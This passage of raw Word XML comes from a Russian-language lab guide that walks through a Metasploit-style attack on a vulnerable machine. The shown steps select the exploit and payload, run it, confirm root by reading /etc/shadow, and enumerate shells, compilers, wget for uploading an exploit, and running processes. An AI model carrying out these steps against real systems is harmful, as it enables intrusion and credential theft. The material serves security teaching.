          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46B1D357" wp14:editId="483BF1DC">
            <wp:extent cx="5760000" cy="9563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23" r="1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="95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339D2" w14:textId="64478381" w:rsidR="009E2FD9" w:rsidRPr="00F014B1" w:rsidRDefault="003F4BEA" w:rsidP="00ED28F3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cfdfdfd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="099750E9" w14:textId="4DD05CC1" w:rsidR="00575645" w:rsidRPr="00575645" w:rsidRDefault="002A4ECB" w:rsidP="00575645">
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00575645" w:rsidRPr="00575645">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00575645" w:rsidRPr="00575645">
        <w:t>Выбрать эксплойт и ввести адрес уязвимой машины</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07AF66" w14:textId="77777777" w:rsidR="00575645" w:rsidRDefault="00575645" w:rsidP="002A4ECB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00575645">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02638BAD" wp14:editId="667EE468">
            <wp:extent cx="5760000" cy="54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8ABB" w14:textId="000533A3" w:rsidR="00575645" w:rsidRDefault="009E2FD9" w:rsidP="00575645">
      <w:r>
        <w:t>Фактически данным и последующими шагами мы определяем откуда, что и куда отправить (загрузить уязвимость на атакуемую машину)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085518E" w14:textId="77777777" w:rsidR="009E2FD9" w:rsidRPr="00ED28F3" w:rsidRDefault="009E2FD9" w:rsidP="00ED28F3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13372E5C" w14:textId="03690F87" w:rsidR="00792D4B" w:rsidRPr="009E2FD9" w:rsidRDefault="002A4ECB" w:rsidP="00575645">
      <w:r>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="00792D4B" w:rsidRPr="009E2FD9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00792D4B">
        <w:t xml:space="preserve">Выбрать </w:t>
      </w:r>
      <w:r w:rsidR="00792D4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FA2DCD" w14:textId="77777777" w:rsidR="00575645" w:rsidRDefault="00792D4B" w:rsidP="00575645">
      <w:r w:rsidRPr="00792D4B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4771BBC6" wp14:editId="103C6038">
            <wp:extent cx="5760000" cy="3321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FC06" w14:textId="77777777" w:rsidR="00792D4B" w:rsidRPr="00ED28F3" w:rsidRDefault="00792D4B" w:rsidP="00ED28F3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C030E4" w14:textId="1A1CC4B4" w:rsidR="00792D4B" w:rsidRDefault="002A4ECB" w:rsidP="00575645">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00792D4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00792D4B">
        <w:t xml:space="preserve">Указать адрес </w:t>
      </w:r>
      <w:r w:rsidR="00792D4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00792D4B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0C209C4F" w14:textId="77777777" w:rsidR="00792D4B" w:rsidRDefault="00792D4B" w:rsidP="00575645">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00792D4B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E1A16B6" wp14:editId="17A6218B">
            <wp:extent cx="5760000" cy="359320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3161" w14:textId="42BB9AD0" w:rsidR="00322E89" w:rsidRPr="00ED28F3" w:rsidRDefault="00322E89" w:rsidP="00ED28F3">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1388364D" w14:textId="679EC1A9" w:rsidR="00322E89" w:rsidRDefault="00DF31D5" w:rsidP="00575645">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00322E89">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00322E89">
        <w:t>Запустить инфо</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D633" w14:textId="77777777" w:rsidR="00322E89" w:rsidRPr="00322E89" w:rsidRDefault="00322E89" w:rsidP="002A4ECB">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00322E89">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D6B4269" wp14:editId="1F2645EB">
            <wp:extent cx="4804448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444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6581" w14:textId="69CB844B" w:rsidR="00322E89" w:rsidRPr="009E2FD9" w:rsidRDefault="009E2FD9" w:rsidP="00575645">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Обратите внимание на то, что мы и есть «демон». </w:t>
      </w:r>
      <w:r w:rsidR="006D0300">
        <w:t>С этого момента для системы м</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ы выступаем от имени </w:t>
      </w:r>
      <w:r w:rsidR="006D0300" w:rsidRPr="006D0300">
        <w:t>системн</w:t>
      </w:r>
      <w:r w:rsidR="006D0300">
        <w:t>ой</w:t>
      </w:r>
      <w:r w:rsidR="006D0300" w:rsidRPr="006D0300">
        <w:t xml:space="preserve"> службы, работа</w:t>
      </w:r>
      <w:r w:rsidR="006D0300">
        <w:t>ющей</w:t>
      </w:r>
      <w:r w:rsidR="006D0300" w:rsidRPr="006D0300">
        <w:t xml:space="preserve"> в фоновом </w:t>
      </w:r>
      <w:commentRangeStart w:id="7"/>
      <w:r w:rsidR="006D0300" w:rsidRPr="006D0300">
        <w:t>режиме</w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r w:rsidR="00636D99">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="7"/>
      </w:r>
      <w:r w:rsidR="006D0300">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1185AE" w14:textId="77777777" w:rsidR="00ED28F3" w:rsidRPr="00550F4A" w:rsidRDefault="00ED28F3" w:rsidP="00575645">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70816EA6" w14:textId="1A5514F4" w:rsidR="00DF5765" w:rsidRPr="00B83A07" w:rsidRDefault="00DF31D5" w:rsidP="00575645">
      <w:r w:rsidRPr="00DF31D5">
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidR="00B83A07" w:rsidRPr="006B214D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B83A07">
        <w:t xml:space="preserve">Запускаем </w:t>
      </w:r>
      <w:r w:rsidR="00B83A07">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r w:rsidR="00B83A07" w:rsidRPr="006B214D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B83A07">
        <w:t xml:space="preserve">и проверяем, кто мы на </w:t>
      </w:r>
      <w:r w:rsidR="006B214D">
        <w:t>уязвимой</w:t>
      </w:r>
      <w:r w:rsidR="00B83A07">
        <w:t xml:space="preserve"> системе</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307ED8C2" w14:textId="77777777" w:rsidR="000D6486" w:rsidRDefault="00B83A07" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83A07">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="212F3164" wp14:editId="6668FBAD">
            <wp:extent cx="5760000" cy="26739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4719" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="00550F4A" w:rsidRDefault="000D6486" w:rsidP="00BB7C0B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0A3B8A" w14:textId="7C48E3B9" w:rsidR="000D6486" w:rsidRPr="00DF31D5" w:rsidRDefault="00DF31D5" w:rsidP="00BB7C0B">
      <w:r w:rsidRPr="00DF31D5">
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidR="000D6486" w:rsidRPr="00DF31D5">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Проверьте имеем ли мы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF31D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>доступ попробовав получить доступ к ф</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF31D5">
        <w:t>айл</w:t>
      </w:r>
      <w:r>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF31D5">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF31D5">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF31D5">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF31D5">
        <w:t>shadow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, который</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF31D5">
        <w:t xml:space="preserve"> доступен для чтения только пользователю </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF31D5">
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF31D5">
        <w:t xml:space="preserve"> и предназначен для хранения зашифрованных паролей.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169ACC1E" w14:textId="77777777" w:rsidR="000D6486" w:rsidRDefault="000D6486" w:rsidP="006320E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0454DDAD" wp14:editId="21F324D5">
            <wp:extent cx="5760000" cy="81630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4A1A" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="00550F4A" w:rsidRDefault="000D6486" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3948B1EB" w14:textId="6C516816" w:rsidR="00A5730B" w:rsidRPr="00450C01" w:rsidRDefault="00E91E71" w:rsidP="000D6486">
      <w:r>
        <w:t>28</w:t>
      </w:r>
      <w:r w:rsidR="00450C01" w:rsidRPr="00450C01">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Просмотрите </w:t>
      </w:r>
      <w:r w:rsidR="00A5730B">
        <w:t>какие</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в системе</w:t>
      </w:r>
      <w:r w:rsidR="00A5730B">
        <w:t xml:space="preserve"> есть </w:t>
      </w:r>
      <w:commentRangeStart w:id="8"/>
      <w:r w:rsidR="00A5730B">
        <w:t>шеллы</w:t>
      </w:r>
      <w:commentRangeEnd w:id="8"/>
      <w:r w:rsidR="00550F4A">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DE627B" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="00A97D0A" w:rsidRDefault="001E33C9" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>shells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B5101D9" w14:textId="2913640E" w:rsidR="00E91E71" w:rsidRDefault="00E91E71" w:rsidP="000D6486">
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>shells</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> содержит список регистрируемых оболочек в системе. Приложения используют этот файл для определения правильных оболочек. Для каждой оболочки должна быть одна строка, содержащая полный путь к оболочке относительно корня.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F23923" w14:textId="31A75A1D" w:rsidR="00E91E71" w:rsidRDefault="00E91E71" w:rsidP="000D6486">
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">Оболочка </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ОС – это </w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">интерпретатор команд </w:t>
      </w:r>
      <w:r>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t>, обеспечивающий интерфейс для взаимодействия пользователя с функциями системы.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t>Командный интерпретатор исполняет команды своего языка, заданные в командной строке или поступающие из стандартного ввода или указанного файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C38DEC0" w14:textId="1FC6D8E5" w:rsidR="00E91E71" w:rsidRDefault="00E91E71" w:rsidP="000D6486">
      <w:r w:rsidRPr="00E91E71">
        <w:t>В UNIX</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">системах распространены языки командных интерпретаторов </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>ksh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> также альтернативные оболочки </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>zsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>csh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>tcsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5274E7EB" w14:textId="33838397" w:rsidR="00A5730B" w:rsidRPr="00F32FA9" w:rsidRDefault="00E91E71" w:rsidP="000D6486">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidR="00450C01" w:rsidRPr="00FB0948">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Посмотрите</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> доступны</w:t>
      </w:r>
      <w:r>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00E91E71">
        <w:t xml:space="preserve"> компиляторы для определения на каком языке необходимо запускать </w:t>
      </w:r>
      <w:commentRangeStart w:id="9"/>
      <w:r w:rsidRPr="00E91E71">
        <w:t>эксплойт</w:t>
      </w:r>
      <w:commentRangeEnd w:id="9"/>
      <w:r w:rsidR="00550F4A">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="9"/>
      </w:r>
      <w:r w:rsidR="001666C0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F1F70A" w14:textId="77777777" w:rsidR="001E33C9" w:rsidRPr="00F014B1" w:rsidRDefault="00B84FFF" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="195676D9" w14:textId="1D23AE3C" w:rsidR="00E91E71" w:rsidRDefault="00F014B1" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ls -l /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/ | grep -E -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -w '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc|clang</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F014B1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDFE971" w14:textId="77777777" w:rsidR="00F014B1" w:rsidRPr="00F014B1" w:rsidRDefault="00F014B1" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029F1E37" w14:textId="466EDECD" w:rsidR="00450C01" w:rsidRPr="00450C01" w:rsidRDefault="001666C0" w:rsidP="000D6486">
      <w:r>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidR="00450C01" w:rsidRPr="00450C01">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Посмотрите</w:t>
      </w:r>
      <w:r w:rsidR="00450C01">
        <w:t xml:space="preserve"> утилиты</w:t>
      </w:r>
      <w:r>
        <w:t>, которые можно будет использовать для закачки</w:t>
      </w:r>
      <w:r w:rsidR="00450C01">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">эксплойта на атакуемую </w:t>
      </w:r>
      <w:commentRangeStart w:id="10"/>
      <w:r>
        <w:t>машину</w:t>
      </w:r>
      <w:commentRangeEnd w:id="10"/>
      <w:r w:rsidR="00550F4A">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="10"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D56E6D1" w14:textId="77777777" w:rsidR="00B84FFF" w:rsidRPr="00A97D0A" w:rsidRDefault="00B84FFF" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75665FE7" w14:textId="77777777" w:rsidR="00E91E71" w:rsidRDefault="00E91E71" w:rsidP="000D6486"/>
    <w:p w14:paraId="79E1BAAA" w14:textId="7EE10294" w:rsidR="00FF7FF7" w:rsidRPr="00FB0948" w:rsidRDefault="001666C0" w:rsidP="000D6486">
      <w:r>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidR="00FF7FF7" w:rsidRPr="00FB0948">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A37F02" w:rsidRPr="00FB0948">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00731B99">
        <w:t>Рассмотрим все процессы, запущенные в системе:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2FB53" w14:textId="79D94CDF" w:rsidR="002529E7" w:rsidRPr="00A97D0A" w:rsidRDefault="002529E7" w:rsidP="000D6486">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A97D0A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2067092A" w14:textId="2DC27F11" w:rsidR="00731B99" w:rsidRDefault="00731B99" w:rsidP="000D6486">
      <w:r w:rsidRPr="00731B99">
        <w:t xml:space="preserve">Ключ </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B99">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B99">
        <w:t xml:space="preserve"> используется для отображения всех процессов, </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B99">
        <w:t>х</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B99">
        <w:t xml:space="preserve"> — для отображения процессов, отсоединенных от терминала, а ключ </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00731B99">
        <w:t xml:space="preserve"> обеспечивает фильтрование по имени или идентификатору пользователя, который запустил программу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A308AD3" w14:textId="77777777" w:rsidR="00123E6F" w:rsidRPr="00A80E96" w:rsidRDefault="00123E6F" w:rsidP="000D6486">
      <w:r>
        <w:t xml:space="preserve">По этому списку можно смотреть доступные эксплойты для этих сервисов, но мы заранее знаем, что это </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>udev</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="434A9B2A" w14:textId="192CEAAB" w:rsidR="00B83A07" w:rsidRDefault="00B83A07" w:rsidP="00BB7C0B"/>
